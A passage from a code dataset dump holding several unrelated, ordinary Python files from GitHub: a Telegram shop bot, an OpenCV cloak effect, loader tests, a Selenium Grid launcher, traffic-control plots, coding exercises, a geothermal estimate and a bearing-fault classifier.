\"payment methods\")\nasync def payment_methods(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n for i, method in enumerate(payment_methods_list):\n kb.add(InlineKeyboardButton(text=method, callback_data=str(i)))\n kb.adjust(1)\n await callback.message.answer(text=payment_methods_text, reply_markup=kb.as_markup())\n await state.set_state(PaymentMethods.payment_methods)\n\n\n@dp.callback_query(PaymentMethods.method, F.data == \"back\")\nasync def back_to_payment_methods(callback: CallbackQuery, state: FSMContext):\n await payment_methods(callback, state)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"0\")\nasync def cash_payment(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=cash_payment_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"1\")\nasync def cashless_payment(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=cashless_payment_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"2\")\nasync def transfer_to_bank_card(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=transfer_to_bank_card_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"3\")\nasync def transfer_to_e_wallet_card(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=transfer_to_e_wallet_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"4\")\nasync def money_transfer_systems(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=money_transfer_systems_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"5\")\nasync def payment_terminal(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=payment_terminal_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(PaymentMethods.method)\n\n\n# @dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"0\")\n# async def po_pochte(callback: CallbackQuery, state: FSMContext):\n\n\nasync def main() -> None:\n bot = Bot(TOKEN, parse_mode=ParseMode.HTML)\n await dp.start_polling(bot)\n\n\nif __name__ == \"__main__\":\n # logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n asyncio.run(main())\n","repo_name":"mrInsaf/centrmag_new","sub_path":"magbot.py","file_name":"magbot.py","file_ext":"py","file_size_in_byte":34470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43039943501","text":"import cv2\nimport numpy as np\nimport time\n\ncap = cv2.VideoCapture(0)\n\ntime.sleep(3)\ncount = 0\nbackground=0\n\nfor i in range(60):\n\tret,background = cap.read()\n\nwhile(cap.isOpened()):\n\tret, img = cap.read()\n\tif not ret:\n break\n\tcount+=1\n\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n\t# Mask to detect red 
color\n\tlower_red = np.array([0, 100, 100])\n\tupper_red = np.array([10, 255, 255])\n\tmask1 = cv2.inRange(hsv,lower_red,upper_red)\n\n\tlower_red = np.array([160,100,100])\n\tupper_red = np.array([179,255,255])\n\tmask2 = cv2.inRange(hsv,lower_red,upper_red)\n\n\tmask1 = mask1+mask2\n\n\t# Refining the mask corresponding to the detected red color\n\tmask1 = cv2.morphologyEx(mask1, cv2.MORPH_OPEN, np.ones((3,3),np.uint8),iterations=2)\n\tmask1 = cv2.dilate(mask1,np.ones((3,3),np.uint8),iterations = 1)\n\tmask2 = cv2.bitwise_not(mask1)\n\n\t# Generating the final output\n\tres1 = cv2.bitwise_and(background,background,mask=mask1)\n\tres2 = cv2.bitwise_and(img,img,mask=mask2)\n\tfinal_output = cv2.addWeighted(res1,1,res2,1,0)\n\n\tcv2.imshow('Magic !!!',final_output)\n\tk = cv2.waitKey(10)\n\tif k == 27:\n break\n","repo_name":"swarupe/invisibility-cloak","sub_path":"cloak.py","file_name":"cloak.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"42662837784","text":"import os\nimport shutil\nfrom pathlib import Path\n\nimport pytest\n\nfrom hojichar.utils.load_compose import (\n _check_args_num_mismatch,\n _load_module,\n load_compose,\n load_factory_from_file,\n load_filter_from_file,\n load_parametrized_filter_from_file,\n)\n\n\n@pytest.fixture\ndef mock_dir() -> Path:\n mock_dir = Path(__file__).parent / \"mock_profiles\"\n return mock_dir\n\n\ndef test_load_module(mock_dir):\n fpath = mock_dir / \"mock_loading_verification.py\"\n module = _load_module(fpath)\n assert module.IS_LOADED == \"success\"\n\n\ndef test_load_filter_from_file_success(mock_dir):\n fpath = mock_dir / \"mock_filter_success.py\"\n filter = load_filter_from_file(fpath)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_module_load_another(mock_dir):\n # HACK doctest loads *.py file and cause ModuleNotFoundError.\n original = mock_dir / \"mock_filter_load_another_module\"\n fpath = mock_dir / \"mock_filter_load_another_module.py\"\n shutil.copyfile(original, fpath)\n filter = load_filter_from_file(fpath)\n assert filter(\"\") == \"success\"\n os.remove(fpath)\n\n\ndef test_load_filter_from_file_notimplemented(mock_dir):\n fpath = mock_dir / \"mock_filter_notimplemented.py\"\n with pytest.raises(NotImplementedError) as e:\n load_filter_from_file(fpath)\n assert str(e.value) == \"FILTER is not defined in the profile.\"\n\n\ndef test_load_filter_from_file_typeerror(mock_dir):\n fpath = mock_dir / \"mock_filter_typeerror.py\"\n with pytest.raises(TypeError) as e:\n load_filter_from_file(fpath)\n assert str(e.value) == \"FILTER must be hojichar.Compose object.\"\n\n\ndef test_load_factory_from_file_success(mock_dir):\n fpath = mock_dir / \"mock_factory_success.py\"\n factory = load_factory_from_file(fpath)\n filter = factory(\"success\")\n assert filter(\"\") == \"success\"\n\n\ndef test_load_factory_from_file_notimplemented(mock_dir):\n fpath = mock_dir / \"mock_factory_notimplemented.py\"\n with pytest.raises(NotImplementedError) as e:\n load_factory_from_file(fpath)\n assert str(e.value) == \"FACTORY is not defined in the profile\"\n\n\ndef test_load_parametrized_filter_0args(mock_dir):\n fpath = mock_dir / \"mock_factory_0args.py\"\n args = tuple([])\n filter = load_parametrized_filter_from_file(fpath, *args)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_parametrized_filter_1args(mock_dir):\n fpath = mock_dir / \"mock_factory_success.py\"\n args = tuple([\"success\"])\n filter = 
load_parametrized_filter_from_file(fpath, *args)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_parametrized_filter_2args(mock_dir):\n fpath = mock_dir / \"mock_factory_2args.py\"\n args = tuple([\"arg1\", \"arg2\"])\n filter = load_parametrized_filter_from_file(fpath, *args)\n assert filter(\"\") == \"arg1+arg2\"\n\n\ndef test_load_compose_filter(mock_dir):\n fpath = mock_dir / \"mock_filter_success.py\"\n filter = load_compose(fpath)\n assert filter(\"\") == \"success\"\n\n\ndef test_load_compose_filter_unnecessary_args(caplog, mock_dir):\n fpath = mock_dir / \"mock_filter_success.py\"\n args = tuple([\"arg1\", \"arg2\"])\n filter = load_compose(fpath, *args)\n assert filter(\"\") == \"success\"\n assert \"Warning: 2 arguments are ignored.\" in caplog.text\n\n\ndef test_load_compose_factory(mock_dir):\n fpath = mock_dir / \"mock_factory_success.py\"\n args = tuple([\"success\"])\n filter = load_compose(fpath, *args)\n assert filter(\"\") == \"success\"\n\n\ndef test_check_args_num_mismatch(caplog):\n _check_args_num_mismatch(3)\n assert \"Warning: 3 arguments are ignored.\" in caplog.text\n","repo_name":"HojiChar/HojiChar","sub_path":"tests/utils/test_load_compose.py","file_name":"test_load_compose.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"99"} +{"seq_id":"11184829002","text":"from questions_three.exceptions import InvalidConfiguration\nfrom questions_three.module_cfg import config_for_module\nfrom twin_sister import dependency\nfrom selenium import webdriver\n\n\ndef launch_selenium_grid_browser():\n config = config_for_module(__name__)\n hub_url = config.selenium_grid_hub_url\n if not hub_url:\n raise InvalidConfiguration(\"Expected $SELENIUM_GRID_HUB_URL to be configured.\")\n caps = {\"browserName\": config.use_browser}\n if config.use_browser:\n caps[\"browserName\"] = config.use_browser\n browser_version = config.use_browser_version\n if browser_version:\n caps[\"version\"] = browser_version\n return dependency(webdriver).Remote(command_executor=hub_url, desired_capabilities=caps)\n","repo_name":"CyberGRX/questions-three","sub_path":"optional_packages/selenium/questions_three_selenium/browser/selenium_grid.py","file_name":"selenium_grid.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"20673841666","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n'''\n# TRENDS IN MINIMUM GREEN TIME\n\navg_ql = np.array([6.83, 7.51, 3.85, 7.29, -0.88, 0.30, 0.31, 0.35, 2.79, -3.07, -2.53])\n\navg_qt = np.array([-5.19, 15.06, 16.23, 12.36, 10.58, 14.01, 2.08, 6.56, 14.59, 15.19, 14.77])\n\navg_flow = np.array([1.27, 1.24, 1.29, 1.19, 1.01, 1.02, 0.84, 0.87, 0.89, 1.17, 1.28])\n\nu_min = np.array([10, 13, 16, 19, 22, 25, 28, 31, 34, 37, 40])\n\nplt.figure()\nplt.plot(u_min, avg_ql, \"b\")\nplt.title(\"Average Queue Length Improvement vs. Minimum Green Time\")\nplt.xlabel(\"Minimum Green Time (s)\")\nplt.ylabel(\"Performance Improvement of Average Queue Length (%)\")\nplt.axhline(0, color='black', linewidth=.5)\nplt.xlim(10)\nplt.ylim(-5, 10)\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(u_min, avg_qt, \"b\")\nplt.title(\"Average Queue Time Improvement vs. 
Minimum Green Time\")\nplt.xlabel(\"Minimum Green Time (s)\")\nplt.ylabel(\"Performance Improvement of Average Queue Time (%)\")\nplt.axhline(0, color='black', linewidth=.5)\nplt.xlim(10)\nplt.ylim(-7, 20)\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(u_min, avg_flow, \"b\")\nplt.title(\"Average Flow Rate Improvement vs. Minimum Green Time\")\nplt.xlabel(\"Minimum Green Time (s)\")\nplt.ylabel(\"Performance Improvement of Average Flow Rate (%)\")\nplt.xlim(10)\nplt.ylim(0, 4)\nplt.legend()\nplt.gcf().autofmt_xdate()\n\n#plt.show()\n\n# SYSTEM STATE TRAJECTORY\n\ndef plot_line_2_params(x, y1, y2, xlabel, ylabel, y1_label, y2_label, title):\n\n plt.figure()\n plt.stem(x, y1, \"g-\", label=y1_label)\n plt.stem(x, y2, \"r-\", label=y2_label)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.xlim(0)\n plt.ylim(0)\n plt.legend()\n plt.gcf().autofmt_xdate()\n\n# Post process average queue length into per hour data\ndef post_proc_demand(step_size, hrs, directory):\n\n # Reading data from the xml file\n with open(directory, \"r\") as f:\n data = f.read()\n\n soup = BeautifulSoup(data, \"xml\")\n print(\"Successfully parsed the summary file of inserted vehicles\")\n\n f.close()\n\n hourly_demand = [0.0]\n\n steps = soup.find_all(\"step\")\n\n steps_per_s = int(1/step_size)\n #total_steps = (hrs+1)*3600*steps_per_s\n\n j = 1\n\n for i in range(len(steps)):\n\n time = float(steps[i]['time'])\n if time%3600.0 != 0 or time == 0:\n continue\n\n inserted_vehs = float(steps[i][\"inserted\"])\n if len(hourly_demand) > 1:\n hourly_demand.append(inserted_vehs-sum(hourly_demand[:j]))\n else:\n hourly_demand.append(inserted_vehs)\n j += 1\n print(f\"hourly_demand = {hourly_demand}\")\n return hourly_demand\n\n# Actual hourly traffic demand from MMDA data\ndemand_actual = [0, 8491, 9618, 10305, 7898, 7271, 6654, 6585, 8381, 8106, 8871, 9462, 10776, 9620, 8499]\n\nsim_hr = [\"6:00\", \"7:00\", \"8:00\", \"9:00\", \"10:00\", \"11:00\", \"12:00\", \"13:00\", \"14:00\", \"15:00\", \"16:00\", \"17:00\", \"18:00\", \"19:00\", \"20:00\"]\n\ndemand_mpc = post_proc_demand(0.5, 14, \"results\\\\summary_003_mpc.xml\")\n\nplot_line_2_params(sim_hr, demand_mpc, demand_actual, \"Time of Day (hr:min)\", \"Number of Vehicles\", \"Simulator-generated demand\", \"Actual demand\", \"Hourly Traffic in the Intersection for MPC-based TSC Simulation\")\n\nplt.show()\n'''\n\n'''\nC = 75\nk = np.arange(0,C*12,1)\n\ntrajectory_katip_s = [14, 14, 14, 14, 14, 13, 13, 13, 13, 13, 13, 13]\ntrajectory_katip_n = [34, 39, 44, 49, 54, 59, 64, 69, 74, 79, 84, 89]\ntrajectory_aurora_w = [15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26]\ntrajectory_aurora_e_w = [50, 57, 64, 70, 77, 84, 91, 98, 104, 111, 118, 125]\ntrajectory_aurora_e_katip_s = [8,9,10,11,12,13,14,15,17,18,19,20,22]\n\nactual_katip_s = [14, 12, 11, 12, 12, 15, 13, 11, 12, 14, 10, 10]\nactual_katip_n = [34, 38, 46, 50, 5, 54, 59, 57, 61, 66, 52, 45]\nactual_aurora_w = [15, 22, 21, 20, 21, 20, 20, 22, 23, 20, 18, 21]\nactual_aurora_e_w = [50, 75, 78, 80, 80, 78, 80, 78, 77, 76, 86, 109]\nactual_aurora_e_katip_s = [8, 12, 13, 14, 14, 12, 12, 12, 11, 10, 8, 15]\n\ntrajectory_katip_s_new = []\ntrajectory_katip_n_new = []\ntrajectory_aurora_w_new = []\ntrajectory_aurora_e_w_new = []\ntrajectory_aurora_e_katip_s_new = []\n\nactual_katip_s_new = []\nactual_katip_n_new = []\nactual_aurora_w_new = []\nactual_aurora_e_w_new = []\nactual_aurora_e_katip_s_new = []\nfor i in range(12):\n\n trajectory_katip_s_new += [trajectory_katip_s[i]]*C\n 
trajectory_katip_n_new += [trajectory_katip_n[i]]*C\n trajectory_aurora_w_new += [trajectory_aurora_w[i]]*C\n trajectory_aurora_e_w_new += [trajectory_aurora_e_w[i]]*C\n trajectory_aurora_e_katip_s_new += [trajectory_aurora_e_katip_s[i]]*C\n\n actual_katip_s_new += [actual_katip_s[i]]*C\n actual_katip_n_new += [actual_katip_n[i]]*C\n actual_aurora_w_new += [actual_aurora_w[i]]*C\n actual_aurora_e_w_new += [actual_aurora_e_w[i]]*C\n actual_aurora_e_katip_s_new +=[actual_aurora_e_katip_s[i]]*C\n\nplt.figure()\nplt.plot(k, trajectory_katip_s_new, \"g--\", label=\"Predicted\")\nplt.plot(k, actual_katip_s_new, \"g\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Katipuan Ave. South, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_katip_s_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_katip_n_new, \"r--\", label=\"Predicted\")\nplt.plot(k, actual_katip_n_new, \"r\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Katipuan Ave. North, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_katip_n_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_aurora_w_new, \"m--\", label=\"Predicted\")\nplt.plot(k, actual_aurora_w_new, \"m\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Aurora Blvd. West, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_aurora_w_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_aurora_e_w_new, \"c--\", label=\"Predicted\")\nplt.plot(k, actual_aurora_e_w_new, \"c\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Aurora Blvd. East Lanes 1-3, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_aurora_e_w_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\nplt.figure()\nplt.plot(k, trajectory_aurora_e_katip_s_new, \"k--\", label=\"Predicted\")\nplt.plot(k, actual_aurora_e_katip_s_new, \"k\", label=\"Actual\")\nplt.title(\"Predicted Vehicle Count vs. Actual Vehicle Count in Aurora Blvd. 
Lane 4, N = 12, C = 75\")\nplt.ylim(0, max(trajectory_aurora_e_katip_s_new)+10)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Number of vehicles (veh)\")\nplt.legend()\nplt.gcf().autofmt_xdate()\n\n#plt.xlim(10)\n#plt.ylim(-7, 20)\n\nplt.show()\n'''\n\n# Plot Fixed-time TSC vs MPC-based TSC for lower cycle times\nfixed_time_perf_ql = [11.67973289,13.55946825,15.9475019,18.53459987,28.7639795]\nmpc_based_perf_ql = [11.03484458,13.23660218,15.05267055,16.68893072,27.02271858]\nfixed_time_perf_qt = [22.37023087,22.91194918,25.17958151,27.77935478,33.74459006]\nmpc_based_perf_qt = [20.09391631,20.46026922,22.1784476,23.9712574,30.09917043]\nfixed_time_perf_flow = [8467.785714,8495.5,8523.785714,8535.357143,8595.2857143]\nmpc_based_perf_flow = [8549.7857143,8601.6428571,8631.7857143,8661.8571429,8687.7857143]\n\ncycle_times = [70, 80, 90, 100, 154]\nwidth = 4.5\n\n# Plot Fixed-time TSC vs MPC-based TSC for different demand profiles\nfixed_time_profile_1 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_1 = [26.57614985,13.14624454,7727.714286]\nfixed_time_profile_2 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_2 = [26.57614985,13.14624454,7727.714286]\nfixed_time_profile_3 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_3 = [26.57614985,13.14624454,7727.714286]\nfixed_time_profile_4 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_4 = [26.57614985,13.14624454,7727.714286]\n\n# Plot MPC-based TSC for varying vehicle count error\nmpc_ql_error = [29.49078067, 31.41526384, 31.52831467, 31.64088214, 31.77035617]\nmpc_qt_error = [25.88264626, 26.09637689, 26.14654485, 26.18363233, 26.20754507]\nmpc_flow_error = [2157.6250000, 2129.7321429, 2129.9285714, 2128.9107143, 2129.3178571]\n\n#cycle_times = [\"No Error\", \"2% Error\", \"5% Error\", \"10% Error\", \"20% Error\"]\n#cycle_times = [15, 40, 65, 90]\n#width = 9.5\n\nplt.figure()\n\n# Width of a bar \ncycle_times = np.array(cycle_times)\n\nplt.bar(cycle_times, fixed_time_perf_qt, width, label=\"Fixed-time TSC\")\n#plt.bar(cycle_times, mpc_flow_error, color=\"r\", label=\"MPC-based TSC\")\nplt.bar(cycle_times+width, mpc_based_perf_qt, width, color=\"tab:orange\", label=\"MPC-based TSC\")\nplt.title(\"Comparison of Average Queue Times for Similar Cycle Times\")\nplt.xlabel(\"Cycle Time (s)\", fontsize=11)\nplt.ylabel(\"Average Queue Times (s)\", fontsize=11)\nplt.xlim((65,163))\n#plt.xlim((0,109.5))\n#plt.ylim((0,10500))\nplt.xticks([70,80,90,100,154], rotation=0)\n# First argument - A list of positions at which ticks should be placed\n# Second argument - A list of labels to place at the given locations\n#plt.xticks(cycle_times + width / 2, (\"Demand Profile 1\", \"Demand Profile 2\", \"Demand Profile 3\", \"Demand Profile 4\"))\nplt.legend()\n#plt.legend(loc='best')\nplt.gcf().autofmt_xdate()\n\nplt.show()\n","repo_name":"lendl-uy/Smart-Traffic","sub_path":"results/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":9364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72677722244","text":"\n\na = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\nk = 15\n\ns = set()\n\nflag = False\n\nfor i in range(0, len(a)):\n\n if((k-a[i]) in s):\n print(\"number exist\")\n flag = True\n break\n elif(a[i] not in s):\n s.add(a[i])\n\nif(flag == False):\n print(\"does not exxist\")\n","repo_name":"hvaidsain/Python-Algorithms-and-Data-Structures","sub_path":"Implementation/Rough Practice 
Module/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10683310761","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head:\n return \n \n odd_node=head\n even_node=head.next\n evenhead=head.next\n while even_node!=None and even_node.next!=None:\n odd_node.next=odd_node.next.next\n even_node.next=even_node.next.next\n \n odd_node=odd_node.next\n even_node=even_node.next\n odd_node.next=evenhead\n return head\n","repo_name":"HenokMekuanint/Competitiveprogramming","sub_path":"0328-odd-even-linked-list/0328-odd-even-linked-list.py","file_name":"0328-odd-even-linked-list.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"35513089403","text":"from mpl_toolkits.mplot3d import Axes3D\nfrom pylab import *\n\nT_surface = 3.0\nq_geothermal = 0.038\n\nrho_rock = 2794.0\nCp_rock = 682.0\nk_rock = 2.92\n\ntunnel_depth = 1440.0\nfield_radius = 620.0\n\ndef T_ground(z):\n return T_surface - q_geothermal / k_rock * z\n\nclass Voxel:\n\n def __init__(self, xlim, ylim, zlim):\n self.xlim = xlim\n self.ylim = ylim\n self.zlim = zlim\n self.x_center = mean(xlim)\n self.y_center = mean(ylim)\n self.z_center = mean(zlim)\n self.T_mean = T_ground(self.z_center)\n\n def energy_release(self, T_ref):\n delta_T = self.T_mean - T_ref\n volume = (xlim[1] - xlim[0]) * (ylim[1] - ylim[0]) * (zlim[1] - zlim[0])\n # J = W * s ==> GW / 1e9 * h / 3600\n E = rho_rock * Cp_rock * volume * delta_T / (3600.0 * 1e9)\n return E\n\ndef create_voxel(xlim, ylim, zlim):\n z = mean(zlim)\n if z <= -tunnel_depth:\n dx = mean(xlim)\n dy = mean(ylim)\n dz = z + tunnel_depth\n distance = sqrt(dx**2 + dy**2 + dz**2)\n if distance <= field_radius:\n return Voxel(xlim, ylim, zlim)\n return None\n\nT_ref = 2.0\n\ndx, dy, dz = 20, 20, 20\n\nvoxels = []\n\nx_range = arange(-1000, 1000, dz)\ny_range = arange(-1000, 1000, dy)\nz_range = arange(-2000, -1000, dz)\n\nx, y, z, T, E = [], [], [], [], []\n\nfor i in range(len(z_range)):\n zlim = [z_range[i], z_range[i]+dz]\n for j in range(len(y_range)):\n ylim = [y_range[j], y_range[j]+dy]\n for k in range(len(x_range)):\n xlim = [x_range[k], x_range[k]+dx]\n voxel = create_voxel(xlim, ylim, zlim)\n if voxel:\n voxels.append(voxel)\n x.append(voxel.x_center)\n y.append(voxel.y_center)\n z.append(voxel.z_center)\n T.append(voxel.T_mean)\n E.append(voxel.energy_release(T_ref))\n print(\"%.3f %%\"% ((i+1)*100.0/len(z_range)))\n\nprint(\"N=%d\"%len(voxels))\nprint(\"E=%f\"%sum(E))\nprint(\"min(E)=%f, max(E)=%f\"%(min(E),max(E)))\nprint(\"mean(T)=%f\"%(sum(T)/len(T)))\nprint(\"min(T)=%f max(T)=%f\"%(min(T),max(T)))\n\ndelta_T = (sum(T)/len(T)) - T_ref\nvolume = 0.5 * 4.0 / 3.0 * pi * field_radius**3\nE = rho_rock * Cp_rock * volume * delta_T / (3600.0 * 1e9)\nprint(volume*1e-6)\nprint(\"total(E)=%f\"%E)\n\nfig = figure()\nax = Axes3D(fig)\n\nax.scatter(x, y, z, s=T)\n\nshow()\n","repo_name":"giecli/Energiakaivos","sub_path":"Code/Seminar/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25673803773","text":"#Paderborn data autoencoder tests 
envelope\n#used Modules\nimport numpy as np\n#import autoencoderKeras as aK\nfrom scipy.io import loadmat#reading mat file\nimport os\nimport matplotlib.pyplot as plt\nfrom keras.models import Model#type of the ANN model\nfrom keras.layers import Dense,Input,Dropout#fully connected layer\nfrom keras.models import Sequential\nfrom keras.utils import to_categorical\nfrom sklearn.svm import LinearSVC\n#dummies\nnum_of_hidden_layers=3\nnum_of_neurons=[2048,512,128]\nf=np.arange(8189)*(8000/8188)#frequency axis values of envelope signal\nfault_t='inner'\nsample_test=37\nif fault_t=='outer':\n fault_l=1\nelse:\n fault_l=0\n\n#read Data\nsave_path='/home/gurkan/Desktop/mlann/pythonfiles/autoencoder/stacked/autoEncoders/compdecomp1/'\npath='/home/gurkan/Desktop/mlann/matlabfilesenvelopeanalysis/'\ndef readPadeEnvelope(path):\n data={}\n for folders in os.listdir(path):\n env=[]\n if folders.startswith('K'):\n for files in os.listdir(path+folders):\n dummy=loadmat(path+folders+'/'+files)\n if len(env)==0:\n env=dummy['env_mat']\n else:\n env=np.append(env,dummy['env_mat'],axis=1)\n data.update({folders:env})\n return data\n#normalization of data\ndef normalize(data_in):\n data=np.copy(data_in)\n data[:,0]=0\n min_vec=np.min(data,axis=1)\n max_vec=np.max(data,axis=1)-min_vec\n for i in range(len(max_vec)):\n data[i,:]=(data[i,:]-min_vec[i])/max_vec[i]\n data_nors={'min':min_vec,'max':max_vec}\n return data,data_nors\n\ndef denormalize(data_in,data_nors):\n data=np.copy(data_in)\n for i in range(len(data_nors['max'])):\n data[i,:]=data[i,:]*data_nors['max'][i]+data_nors['min'][i]\n return data\n#create training and test sets\ndef create_test_train_set(data):\n '''\n inner=[]\n healthy=[]\n outer=[]\n in_out=[]\n for key in data.keys():\n if '00' in key:\n healthy.append(key)\n elif 'A' in key:\n outer.append(key)\n elif 'I' in key:\n inner.append(key)\n #elif 'B' in key:\n # in_out.append(key)\n test_set=[]\n '''\n test_set=[['K001','KA04','KI04'],['K002','KA15','KI14'],['K003','KA16','KI16'],['K004','KA22','KI18'],['K005','KA30','KI21']]\n train_set=[]\n for i in range(len(test_set)):\n train_set.append(list(set(data.keys())-set(test_set[i])))\n return train_set,test_set\n\n#extracting features for data\ndef feature_extract(data,f):\n inner_f=123.3\n f_turn=25\n outer_f=76.25\n f_inner=np.argmin(abs(f-inner_f))\n f_inner2=np.argmin(abs(f-inner_f+f_turn))\n f_outer=np.argmin(abs(f-outer_f))\n inner=[np.sum(np.concatenate((data['data'][i,:][f_inner-1:f_inner+2],data['data'][i,:][f_inner2-1:f_inner2+2]),axis=0))/np.max(data['data'][i,:]) for i in range(len(data['data'][:,0]))]\n outer=[np.sum(np.concatenate((data['data'][i,:][f_outer-1:f_outer+2],data['data'][i,:][2*f_outer-1:2*f_outer+2]),axis=0))/np.max(data['data'][i,:]) for i in range(len(data['data'][:,0]))]\n data_stats={'inner':np.asarray(inner),'outer':np.asarray(outer)}\n return data_stats\n\ndef ready_to_classify(data,training_set,test_set):\n training_data=[]\n training_labels=[]\n test_data=[]\n test_labels=[]\n for key in data.keys():\n for i in range(np.size((data[key]),axis=1)):\n if key in training_set:\n training_data.append(data[key][:,i])\n if key.startswith('KI'):\n training_labels.append(1)\n elif key.startswith('KA'):\n training_labels.append(2)\n else:\n training_labels.append(0)\n else:\n test_data.append(data[key][:,i])\n if key.startswith('KI'):\n test_labels.append(1)\n elif key.startswith('KA'):\n test_labels.append(2)\n else:\n test_labels.append(0)\n data=(np.asarray(training_data))\n data_t=(np.asarray(test_data))\n 
training={'data':data,'labels':np.asarray(training_labels)}\n test={'data':data_t,'labels':np.asarray(test_labels)}\n return training,test\n\n#healthy values\ndef healthy_average_std(data_features,data_labels,fault_type):\n if fault_type=='inner':\n _index_h=np.where(data_labels!=1)\n _index_f=np.where(data_labels==1)\n else:\n _index_h=np.where(data_labels!=2)\n _index_f=np.where(data_labels==2)\n _mean=np.mean(data_features[fault_type][_index_h])\n _std=np.std(data_features[fault_type][_index_h])\n _mean_f=np.mean(data_features[fault_type][_index_f])\n _std_f=np.std(data_features[fault_type][_index_f])\n return _mean,_std,_std_f,_mean_f\n\n#Rule Based classifier\ndef my_classifier(test_data_features,thr_i,thr_o):\n p_l=np.zeros(len(test_data_features['inner']))\n for i in range(len(test_data_features['inner'])):\n if test_data_features['inner'][i]>thr_i:\n if test_data_features['inner'][i]>test_data_features['outer'][i]:\n p_l[i]=1\n else:\n p_l[i]=2\n elif test_data_features['outer'][i]>thr_o:\n p_l[i]=2\n\n return p_l\n\n#ROC curve\ndef my_roc(data_features,data_labels,h_mu,h_std,fault_type):\n _k=np.linspace((np.max(data_features)-h_mu)/h_std,(np.min(data_features)-h_mu)/h_std,num=1000)\n _acc=np.ones(len(_k))\n _tpr=np.ones(len(_k))\n _fpr=np.ones(len(_k))\n for i in range(len(_k)):\n if fault_type=='inner':\n _tpr[i]=np.sum([a and b for a, b in 